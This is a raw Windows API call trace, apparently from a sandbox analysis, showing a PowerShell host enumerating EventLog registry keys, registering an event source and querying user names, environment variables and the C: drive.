	[0796.258] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x0, lpName=0x403ff0, lpcchName=0x1ecf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ecf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.259] CoTaskMemFree (pv=0x403ff0) 
	[0796.259] CoTaskMemFree (pv=0x0) 
	[0796.259] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.259] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x1, lpName=0x403ff0, lpcchName=0x1ecf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ecf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.259] CoTaskMemFree (pv=0x403ff0) 
	[0796.259] CoTaskMemFree (pv=0x0) 
	[0796.259] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.259] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x2, lpName=0x403ff0, lpcchName=0x1ecf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ecf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.259] CoTaskMemFree (pv=0x403ff0) 
	[0796.259] CoTaskMemFree (pv=0x0) 
	[0796.259] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.259] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x3, lpName=0x403ff0, lpcchName=0x1ecf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ecf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.259] CoTaskMemFree (pv=0x403ff0) 
	[0796.259] CoTaskMemFree (pv=0x0) 
	[0796.259] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.260] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x4, lpName=0x403ff0, lpcchName=0x1ecf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ecf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.260] CoTaskMemFree (pv=0x403ff0) 
	[0796.260] CoTaskMemFree (pv=0x0) 
	[0796.260] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.260] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x5, lpName=0x403ff0, lpcchName=0x1ecf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ecf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.260] CoTaskMemFree (pv=0x403ff0) 
	[0796.260] CoTaskMemFree (pv=0x0) 
	[0796.260] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.260] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x6, lpName=0x403ff0, lpcchName=0x1ecf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ecf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.260] CoTaskMemFree (pv=0x403ff0) 
	[0796.260] CoTaskMemFree (pv=0x0) 
	[0796.260] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.260] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x7, lpName=0x403ff0, lpcchName=0x1ecf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ecf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.260] CoTaskMemFree (pv=0x403ff0) 
	[0796.260] CoTaskMemFree (pv=0x0) 
	[0796.261] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.261] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x8, lpName=0x403ff0, lpcchName=0x1ecf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ecf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.261] CoTaskMemFree (pv=0x403ff0) 
	[0796.261] CoTaskMemFree (pv=0x0) 
	[0796.261] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x344) returned 0x0
	[0796.261] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x0) returned 0x2
	[0796.261] RegOpenKeyExW (in: hKey=0x368, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x36c) returned 0x0
	[0796.261] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x0) returned 0x2
	[0796.261] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x370) returned 0x0
	[0796.261] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x0) returned 0x2
	[0796.262] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x374) returned 0x0
	[0796.262] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x0) returned 0x2
	[0796.262] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x378) returned 0x0
	[0796.262] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x0) returned 0x2
	[0796.262] RegOpenKeyExW (in: hKey=0x368, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x37c) returned 0x0
	[0796.262] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x0) returned 0x2
	[0796.262] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x380) returned 0x0
	[0796.262] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x0) returned 0x2
	[0796.262] RegOpenKeyExW (in: hKey=0x368, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x384) returned 0x0
	[0796.263] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x0) returned 0x2
	[0796.263] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x388) returned 0x0
	[0796.263] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x38c) returned 0x0
	[0796.263] RegCloseKey (hKey=0x38c) returned 0x0
	[0796.263] RegCloseKey (hKey=0x368) returned 0x0
	[0796.264] RegCloseKey (hKey=0x388) returned 0x0
	[0796.264] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1eced8 | out: phkResult=0x1eced8*=0x388) returned 0x0
	[0796.265] RegQueryInfoKeyW (in: hKey=0x388, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ece4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ece48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ece4c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ece48*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.265] CoTaskMemFree (pv=0x0) 
	[0796.265] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.265] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x0, lpName=0x403ff0, lpcchName=0x1eced8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1eced8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.265] CoTaskMemFree (pv=0x403ff0) 
	[0796.265] CoTaskMemFree (pv=0x0) 
	[0796.265] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.265] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x1, lpName=0x403ff0, lpcchName=0x1eced8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1eced8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.265] CoTaskMemFree (pv=0x403ff0) 
	[0796.265] CoTaskMemFree (pv=0x0) 
	[0796.265] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.265] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x2, lpName=0x403ff0, lpcchName=0x1eced8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1eced8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.265] CoTaskMemFree (pv=0x403ff0) 
	[0796.265] CoTaskMemFree (pv=0x0) 
	[0796.265] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.266] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x3, lpName=0x403ff0, lpcchName=0x1eced8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1eced8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.266] CoTaskMemFree (pv=0x403ff0) 
	[0796.266] CoTaskMemFree (pv=0x0) 
	[0796.266] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.266] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x4, lpName=0x403ff0, lpcchName=0x1eced8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1eced8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.266] CoTaskMemFree (pv=0x403ff0) 
	[0796.266] CoTaskMemFree (pv=0x0) 
	[0796.266] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.266] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x5, lpName=0x403ff0, lpcchName=0x1eced8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1eced8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.266] CoTaskMemFree (pv=0x403ff0) 
	[0796.266] CoTaskMemFree (pv=0x0) 
	[0796.266] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.266] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x6, lpName=0x403ff0, lpcchName=0x1eced8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1eced8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.266] CoTaskMemFree (pv=0x403ff0) 
	[0796.266] CoTaskMemFree (pv=0x0) 
	[0796.266] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.267] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x7, lpName=0x403ff0, lpcchName=0x1eced8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1eced8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.267] CoTaskMemFree (pv=0x403ff0) 
	[0796.267] CoTaskMemFree (pv=0x0) 
	[0796.267] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.267] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x8, lpName=0x403ff0, lpcchName=0x1eced8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1eced8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.267] CoTaskMemFree (pv=0x403ff0) 
	[0796.267] CoTaskMemFree (pv=0x0) 
	[0796.267] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf38 | out: phkResult=0x1ecf38*=0x368) returned 0x0
	[0796.267] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf38 | out: phkResult=0x1ecf38*=0x0) returned 0x2
	[0796.267] RegOpenKeyExW (in: hKey=0x388, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf38 | out: phkResult=0x1ecf38*=0x38c) returned 0x0
	[0796.267] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf38 | out: phkResult=0x1ecf38*=0x0) returned 0x2
	[0796.268] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf38 | out: phkResult=0x1ecf38*=0x390) returned 0x0
	[0796.268] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf38 | out: phkResult=0x1ecf38*=0x0) returned 0x2
	[0796.268] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf38 | out: phkResult=0x1ecf38*=0x394) returned 0x0
	[0796.268] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf38 | out: phkResult=0x1ecf38*=0x0) returned 0x2
	[0796.268] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf38 | out: phkResult=0x1ecf38*=0x398) returned 0x0
	[0796.268] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf38 | out: phkResult=0x1ecf38*=0x0) returned 0x2
	[0796.269] RegOpenKeyExW (in: hKey=0x388, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf38 | out: phkResult=0x1ecf38*=0x39c) returned 0x0
	[0796.269] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf38 | out: phkResult=0x1ecf38*=0x0) returned 0x2
	[0796.269] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf38 | out: phkResult=0x1ecf38*=0x3a0) returned 0x0
	[0796.269] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf38 | out: phkResult=0x1ecf38*=0x0) returned 0x2
	[0796.269] RegOpenKeyExW (in: hKey=0x388, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf38 | out: phkResult=0x1ecf38*=0x3a4) returned 0x0
	[0796.269] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf38 | out: phkResult=0x1ecf38*=0x0) returned 0x2
	[0796.269] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf38 | out: phkResult=0x1ecf38*=0x3a8) returned 0x0
	[0796.269] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf38 | out: phkResult=0x1ecf38*=0x3ac) returned 0x0
	[0796.270] RegCloseKey (hKey=0x3ac) returned 0x0
	[0796.270] RegCloseKey (hKey=0x388) returned 0x0
	[0796.270] RegCloseKey (hKey=0x3a8) returned 0x0
	[0797.293] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b980008
	[0798.397] ReportEventW (hEventLog=0x1b980008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x307e788*="WSMan", lpRawData=0x307e4f8) returned 1
	[0798.398] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0798.398] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0798.398] CoTaskMemFree (pv=0x41ebe0) 
	[0798.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0798.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0798.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0798.401] CoTaskMemAlloc (cb=0x804) returned 0x1b8afae0
	[0798.401] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8afae0, nSize=0x1ed1c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed1c8) returned 0x1
	[0798.401] CoTaskMemFree (pv=0x1b8afae0) 
	[0798.401] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0798.401] GetUserNameW (in: lpBuffer=0x403ff0, pcbBuffer=0x1ed208 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed208) returned 1
	[0798.401] CoTaskMemFree (pv=0x403ff0) 
	[0798.402] ReportEventW (hEventLog=0x1b980008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3083cc0*="Alias", lpRawData=0x3083a50) returned 1
	[0798.403] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0798.403] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0798.403] CoTaskMemFree (pv=0x41ebe0) 
	[0798.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0798.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0798.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0798.406] CoTaskMemAlloc (cb=0x804) returned 0x1b8afae0
	[0798.406] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8afae0, nSize=0x1ed1c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed1c8) returned 0x1
	[0798.406] CoTaskMemFree (pv=0x1b8afae0) 
	[0798.406] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0798.406] GetUserNameW (in: lpBuffer=0x403ff0, pcbBuffer=0x1ed208 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed208) returned 1
	[0798.407] CoTaskMemFree (pv=0x403ff0) 
	[0798.407] ReportEventW (hEventLog=0x1b980008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30892b8*="Environment", lpRawData=0x3089048) returned 1
	[0798.408] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0798.408] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0798.408] CoTaskMemFree (pv=0x41ebe0) 
	[0798.410] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0798.410] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0798.410] CoTaskMemFree (pv=0x41ebe0) 
	[0798.410] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0798.410] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0798.410] CoTaskMemFree (pv=0x41ebe0) 
	[0798.410] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1ecd70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0798.410] SetErrorMode (uMode=0x1) returned 0x1
	[0798.411] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1ecf80 | out: lpFileInformation=0x1ecf80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0798.411] SetErrorMode (uMode=0x1) returned 0x1
	[0798.412] GetLogicalDrives () returned 0x4
	[0798.413] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ecae0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0798.414] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0798.414] SetErrorMode (uMode=0x1) returned 0x1
	[0798.415] CoTaskMemAlloc (cb=0x68) returned 0x47e750
	[0798.415] CoTaskMemAlloc (cb=0x68) returned 0x47f2b0
	[0798.415] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x47e750, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x1ecf50, lpMaximumComponentLength=0x1ecf4c, lpFileSystemFlags=0x1ecf48, lpFileSystemNameBuffer=0x47f2b0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ecf50*=0x9c354b42, lpMaximumComponentLength=0x1ecf4c*=0xff, lpFileSystemFlags=0x1ecf48*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0798.415] CoTaskMemFree (pv=0x47e750) 
	[0798.415] CoTaskMemFree (pv=0x47f2b0) 
	[0798.415] SetErrorMode (uMode=0x1) returned 0x1
	[0798.415] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0798.417] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecc90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0798.417] SetErrorMode (uMode=0x1) returned 0x1
	[0798.417] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ecef0 | out: lpFileInformation=0x1ecef0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0798.417] SetErrorMode (uMode=0x1) returned 0x1
	[0798.417] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecc90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0798.417] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ecb40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0798.417] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0798.418] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0798.418] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0798.419] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecac0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0798.419] SetErrorMode (uMode=0x1) returned 0x1
	[0798.419] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ecd20 | out: lpFileInformation=0x1ecd20*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0798.419] SetErrorMode (uMode=0x1) returned 0x1
	[0798.419] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecac0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
